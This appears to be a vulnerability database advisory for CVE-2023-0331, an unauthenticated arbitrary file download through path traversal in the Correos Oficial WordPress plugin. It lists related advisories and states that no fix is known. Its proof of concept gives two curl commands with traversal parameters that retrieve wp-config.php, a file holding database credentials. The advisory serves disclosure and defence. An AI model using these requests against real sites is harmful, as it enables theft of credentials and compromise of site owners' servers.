Correos Oficial <= 1.3.0.0 – Unauthenticated Arbitrary File Download | CVE 2023-0331 | Plugin Vulnerabilities

Description

The plugin does not have an authorization check user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.

Proof of Concept

Dependency: WooCommerce plugin

Use the following curl command to download the contents of the wp-config.php file:

curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=../../..&filename=wp-config.php' 

or

curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=..&filename=/../../wp-config.php'

Affects Plugins

No known fix

References

CVE

Classification

Type

FILE DOWNLOAD

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Andrea Iodice

Submitter

Andrea Iodice

Verified

Yes

WPVDB ID

1b4dbaf3-1364-4103-9a7b-b5a1355c685b

Timeline

Publicly Published

2023-01-31 (about 1 years ago)

Added

2023-01-31 (about 1 years ago)

Last Updated

2023-02-01 (about 1 years ago)

Other

Published

Title

Published

2022-07-12

Title

WSM Downloader <= 1.4.0 - Unauthenticated Arbitrary File Download

Published

2023-09-25

Title

NextGEN Gallery < 3.39 - Admin+ Arbitrary File Read and Delete

Published

2022-12-05

Title

Welcart e-Commerce < 2.8.5 - Subscriber+ Arbitrary File Access

Published

2022-01-06

Title

RVM - Responsive Vector Maps < 6.4.2 - Subscriber+ Arbitrary File Read

Published

2022-11-28

Title

Wholesale Market for WooCommerce < 1.0.7 - Unauthenticated Arbitrary File Download